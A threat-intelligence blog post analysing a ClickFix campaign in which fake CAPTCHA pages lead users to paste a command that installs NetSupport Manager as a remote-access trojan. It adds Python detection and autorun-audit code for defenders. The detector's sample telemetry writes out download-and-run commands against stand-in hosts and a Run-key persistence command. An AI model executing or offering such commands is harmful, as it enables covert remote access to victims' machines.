NetSupport, Courtesy of Your Clipboard

The ongoing ClickFix campaign continues to evolve, as threat actors are adopting additional delivery methods designed to bypass traditional defenses through user interaction. While the broader campaign has been previously analyzed, the latest tactics observed demonstrate a continued emphasis on abusing native tools and social engineering. 

This campaign has been known to direct users to pages that mimic CAPTCHA verifications. These pages are visually convincing, using modern styling frameworks to establish trust. Once engaged, the user is prompted to execute a pre-populated command via the Windows Run dialog, a technique that leverages clipboard manipulation or on-screen instructions to initiate execution. 

The most recent variation seen in the wild by the Blackpoint SOC ultimately tricks victims into installing NetSupport Manager, a legitimate remote administration product, as a Remote Access Trojan (RAT). The final payload is staged and persisted on disk using native utilities, giving adversaries full remote access with minimal friction. 

Image 1: Process tree of the ClickFix execution. 

Dissecting the Execution Chain 

Victims are directed to a legitimate website that has been compromised and is hosting malicious JavaScript. This JavaScript renders a fake CAPTCHA prompt, instructing the user to press Win + R and paste a command into the Windows Run dialog box.  

Image 2: Initial one-liner command execution. 

Once that command is executed, it downloads and executes a malicious batch script. Let’s break it down further: 

1. Execution Setup and Handling 

The script begins by turning off command echo (the @echo off idiom) so that the commands it runs are not displayed in the console, and enables delayed variable expansion (setlocal EnableDelayedExpansion) so that variables are evaluated at run time rather than at parse time, which matters inside conditional blocks and loops.

Image 3: Suppressing command output and enabling delayed variable expansion. 

2. Variable Initialization 

With the initial setup complete, the script creates four key variables: 

  • The second stage URL to download a ZIP archive containing the RAT payload. 
  • The target path to save this ZIP archive within the user’s AppData directory. 
  • The extraction path for the ZIP archive. 
  • The full path of the final payload (client32.exe).

Image 4: Defining variables for remote URL, staging and extraction directories, and full path of final payload. 

3. Directory Setup  

A check is performed to ensure the defined extraction directory exists. If it does not, the script creates it using mkdir. This is the destination directory for the contents of the ZIP archive.

Image 5: Checking for the defined extraction directory and creating one if it doesn’t exist. 

4. Second Stage ZIP Archive  

Using PowerShell’s Invoke-WebRequest, the script fetches the ZIP archive from the attacker-controlled domain and stores it in the defined staging directory as Application.zip. Notably, powershell.exe is launched with -WindowStyle Hidden so that no console window is shown to the user while the download runs. 

Image 6: Using PowerShell’s Invoke-WebRequest to retrieve ZIP from second stage domain. 

5. Payload Extraction 

The downloaded ZIP archive is extracted from PowerShell using the .NET System.IO.Compression.ZipFile class. The payload is unpacked into the previously created Options directory under the user’s AppData folder.

Image 7: Using PowerShell’s System.IO.Compression.ZipFile .NET class to extract the ZIP archive 

6. Payload Execution  

Immediately after extraction, the script launches client32.exe, which is a NetSupport Manager binary, via the start command.

Image 8: Executing the freshly extracted NetSupport Manager binary. 

7. Establish Persistence 

To establish persistence, the script adds a value named Support11 under the current user’s Run key (HKCU\Software\Microsoft\Windows\CurrentVersion\Run), pointing to the NetSupport binary. Windows launches every entry in this key at the user’s interactive logon, so the RAT is relaunched each time the victim logs in.

Image 9: Establishing persistence via a Current User Run registry key. 

8. Staging Cleanup  

Finally, the script deletes the ZIP archive used for staging. This cleanup helps reduce forensic artifacts and draw less attention post-compromise. 

Image 10: Deletion of the staging ZIP archive. 
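To make the chain above useful for detection, here is an added example (not part of the original write-up and not Blackpoint tooling) that scores process-creation telemetry for the stages described in steps 1 through 7 and alerts when several of them land on one user within a short window. The events are constructed to mimic Sysmon Event ID 1 fields; the usernames, the example.invalid domains, the 120-second window and the three-stage threshold are assumptions, while Application.zip, the Options directory, client32.exe and the Support11 value come from the analysis above.

```python
import re
from collections import defaultdict

# Event fields mimic Sysmon Event ID 1: ts (epoch seconds), user, image,
# parent_image, cmdline. Each rule maps one stage of the observed chain
# onto a single process-creation event.
def _image_is(event, *names):
    return event["image"].lower().endswith(tuple("\\" + n for n in names))

STAGE_RULES = {
    # Step 1 of the chain: the Run dialog (explorer.exe) spawns a shell directly
    "run_dialog_launch": lambda e: e["parent_image"].lower().endswith("\\explorer.exe")
        and _image_is(e, "cmd.exe", "powershell.exe"),
    # Step 4: a hidden PowerShell window fetching the second stage
    "hidden_powershell_download": lambda e: _image_is(e, "powershell.exe")
        and re.search(r"-w(?:indowstyle)?\s+hidden", e["cmdline"], re.I)
        and re.search(r"invoke-webrequest|\biwr\b|downloadfile|\bcurl\b", e["cmdline"], re.I),
    # Step 5: archive extraction through .NET ZipFile or Expand-Archive
    "archive_extraction": lambda e: _image_is(e, "powershell.exe")
        and re.search(r"ZipFile\]::ExtractToDirectory|Expand-Archive", e["cmdline"], re.I),
    # Step 6: the NetSupport client started from a user-writable location
    "netsupport_launch": lambda e: _image_is(e, "client32.exe")
        and "\\appdata\\" in e["image"].lower(),
    # Step 7: reg.exe writing a Run/RunOnce value for persistence
    "run_key_persistence": lambda e: _image_is(e, "reg.exe")
        and re.search(r"\badd\b.*\\currentversion\\run(?:once)?\b", e["cmdline"], re.I),
}

WINDOW_SECONDS = 120   # assumption: the observed chain completes within seconds
MIN_STAGES = 3         # assumption: three distinct stages is enough to alert

def detect_clickfix_chain(events, window=WINDOW_SECONDS, min_stages=MIN_STAGES):
    """Return one alert per user whose events match at least `min_stages`
    distinct stages inside a `window`-second span. Each alert carries the
    user, the sorted stage names and the first/last matching timestamps."""
    hits = defaultdict(list)                       # user -> [(ts, stage), ...]
    for e in sorted(events, key=lambda e: e["ts"]):
        for stage, rule in STAGE_RULES.items():
            if rule(e):
                hits[e["user"]].append((e["ts"], stage))

    alerts = []
    for user, stage_hits in hits.items():
        for i, (t0, _) in enumerate(stage_hits):
            in_window = [(t, s) for t, s in stage_hits[i:] if t - t0 <= window]
            stages = {s for _, s in in_window}
            if len(stages) >= min_stages:
                alerts.append({"user": user, "stages": sorted(stages),
                               "start": t0, "end": in_window[-1][0]})
                break                              # one alert per user is enough
    return alerts

# Constructed telemetry (not real logs). Alice opens an ordinary command prompt,
# which trips the first rule alone and must not alert; Bob pastes the ClickFix
# one-liner into Win+R. Domains use .invalid on purpose.
BOB_APPDATA = "C:\\Users\\bob\\AppData\\Roaming"
SAMPLE_EVENTS = [
    {"ts": 1000, "user": "CORP\\alice", "image": "C:\\Windows\\System32\\cmd.exe",
     "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "cmd.exe"},
    {"ts": 1003, "user": "CORP\\alice", "image": "C:\\Windows\\System32\\ipconfig.exe",
     "parent_image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "ipconfig /all"},
    {"ts": 2000, "user": "CORP\\bob", "image": "C:\\Windows\\System32\\cmd.exe",
     "parent_image": "C:\\Windows\\explorer.exe",
     "cmdline": "cmd /c curl -s https://stage1.example.invalid/a.bat -o %TEMP%\\a.bat && %TEMP%\\a.bat"},
    {"ts": 2004, "user": "CORP\\bob",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "powershell -WindowStyle Hidden -Command \"Invoke-WebRequest -Uri "
                "https://stage2.example.invalid/Application.zip -OutFile "
                + BOB_APPDATA + "\\Application.zip\""},
    {"ts": 2006, "user": "CORP\\bob",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "powershell -Command \"Add-Type -AssemblyName System.IO.Compression.FileSystem; "
                "[System.IO.Compression.ZipFile]::ExtractToDirectory('" + BOB_APPDATA
                + "\\Application.zip', '" + BOB_APPDATA + "\\Options')\""},
    {"ts": 2008, "user": "CORP\\bob", "image": BOB_APPDATA + "\\Options\\client32.exe",
     "parent_image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "client32.exe"},
    {"ts": 2009, "user": "CORP\\bob", "image": "C:\\Windows\\System32\\reg.exe",
     "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Support11 "
                "/t REG_SZ /d \"" + BOB_APPDATA + "\\Options\\client32.exe\" /f"},
]

if __name__ == "__main__":
    for alert in detect_clickfix_chain(SAMPLE_EVENTS):
        print(f"{alert['user']}: {', '.join(alert['stages'])} "
              f"between t={alert['start']} and t={alert['end']}")
```

Run as-is it reports only Bob, with all five stages between t=2000 and t=2009; Alice’s explorer.exe to cmd.exe launch matches one rule and stays silent. The stage-count threshold is what keeps the first rule (which every interactive command prompt trips) from alerting on its own, and the window is what ties a hidden download to a Run-key write a few seconds later rather than to one a week apart.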

Why it Matters 

While the tooling observed is well-known, the tactic of leveraging user-driven execution via system-native dialogs presents a unique challenge for Managed Service Providers (MSPs), as it: 

  • Bypasses attachment-based detections and URL filtering. 
  • Appears user-driven, reducing the likelihood of immediate flagging by EDR. 
  • Abuses common administrative tooling and software that may already be permitted. 

The implications are significant for MSPs, who often rely on remote access tooling and scripting for legitimate support operations, making it difficult to distinguish malicious use from day-to-day behavior. 

Defensive Considerations 

To mitigate this technique, take the following into consideration: 

  • User education on suspicious prompts to run commands to “prove you are human”. 
  • Monitor telemetry for rapid chaining of native tools like cmd, curl, reg.exe, and PowerShell. 
  • Flag registry autoruns from user-writable paths or non-standard executables. 
  • Strict application controls or contextual allow-listing for remote management tools. 
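The third bullet, flagging autoruns from user-writable paths or non-standard executables, is worked through in the added example below; it is not code from the original post or from Blackpoint. It audits Run-key values handed to it as (key, value name, command) tuples, the shape you get from reg query or Get-ItemProperty. The entries and the environment-variable mapping are constructed for offline use, and the only remote-access binary name it knows is client32.exe from this case; everything else (root list, hypothetical value names) is an assumption to extend for your environment.

```python
import ntpath
import re

# Roots an unprivileged user can write to; a persistence target under any of
# these deserves a look. Matched case-insensitively on the expanded path.
USER_WRITABLE_ROOT = re.compile(
    r"^[a-z]:\\(?:users\\[^\\]+\\appdata\\|users\\public\\|programdata\\|windows\\temp\\|temp\\)",
    re.I)

# Remote-access client binaries to treat as non-standard autoruns. Only the
# NetSupport client from this case is listed; extend with your own set.
REMOTE_ACCESS_BINARIES = {"client32.exe"}

# Constructed environment for offline use; a live hunt would use the victim's
# real variables (os.environ or the user's registry Environment key).
ENV = {
    "APPDATA": "C:\\Users\\bob\\AppData\\Roaming",
    "LOCALAPPDATA": "C:\\Users\\bob\\AppData\\Local",
    "TEMP": "C:\\Users\\bob\\AppData\\Local\\Temp",
    "PROGRAMDATA": "C:\\ProgramData",
    "WINDIR": "C:\\Windows",
    "SYSTEMROOT": "C:\\Windows",
}

def expand_env(command, env=ENV):
    """Expand %VAR% tokens the way cmd.exe would; unknown names are left as-is."""
    return re.sub(r"%([^%\s]+)%", lambda m: env.get(m.group(1).upper(), m.group(0)), command)

def target_of(command, env=ENV):
    """Pull the executable path out of an autorun command line. Handles a
    quoted path, an unquoted path ending in .exe (spaces included), and falls
    back to the first whitespace-delimited token."""
    cmd = expand_env(command, env).strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    m = re.match(r"(.+?\.exe)(?=\s|$)", cmd, re.I)
    return m.group(1) if m else cmd.split()[0]

def audit_autoruns(entries, env=ENV):
    """entries: iterable of (key, value_name, command). Returns one finding per
    entry whose target sits in a user-writable root or is a known remote-access
    client, listing the reasons that fired."""
    findings = []
    for key, name, command in entries:
        target = target_of(command, env)
        reasons = []
        if USER_WRITABLE_ROOT.match(target):
            reasons.append("user-writable path")
        if ntpath.basename(target).lower() in REMOTE_ACCESS_BINARIES:
            reasons.append("known remote-access client")
        if reasons:
            findings.append({"key": key, "name": name, "target": target, "reasons": reasons})
    return findings

HKCU_RUN = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
HKLM_RUN = "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"

# Constructed autorun inventory: two ordinary entries plus the Support11 value
# this campaign writes, pointing at client32.exe under AppData\Roaming\Options.
SAMPLE_AUTORUNS = [
    (HKLM_RUN, "SecurityHealth", "%windir%\\system32\\SecurityHealthSystray.exe"),
    (HKCU_RUN, "OneDrive", "\"%LOCALAPPDATA%\\Microsoft\\OneDrive\\OneDrive.exe\" /background"),
    (HKCU_RUN, "Support11", "%APPDATA%\\Options\\client32.exe"),
]

if __name__ == "__main__":
    for f in audit_autoruns(SAMPLE_AUTORUNS):
        print(f"{f['key']}\\{f['name']} -> {f['target']}  [{'; '.join(f['reasons'])}]")
```

Two entries come back: Support11 with both reasons, and the OneDrive entry on the path heuristic alone. That second hit is the expected noise, since several mainstream products install per-user under AppData, which is why the path check should be paired with the signer- or hash-based allow-listing the last bullet calls for rather than used as a block rule by itself. Feeding the script the HKLM Run key, the RunOnce keys and Winlogon/Scheduled Task targets is a natural extension.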

Implementing Blackpoint’s Managed Application Control (MAC) offering can be particularly effective in this scenario. Restricting which binaries are allowed to execute can prevent unauthorized instances of NetSupport Manager and other remote access tools from launching. 

For MSPs, this is critical: a single rogue RAT can be leveraged not only to compromise one host but also to move laterally throughout an environment. Proactively blocking unapproved executables ensures a stronger security posture without disrupting legitimate IT operations. 

This tactic reinforces a core reality of modern threats: even known campaigns continue to evolve and adapt, and adversaries will keep finding new ways to repurpose benign features of the operating system to evade detection. Awareness and adaptive monitoring remain critical, especially for MSPs entrusted with protecting broader ecosystems. 

Date published: June 25, 2025
Author: Blackpoint Cyber
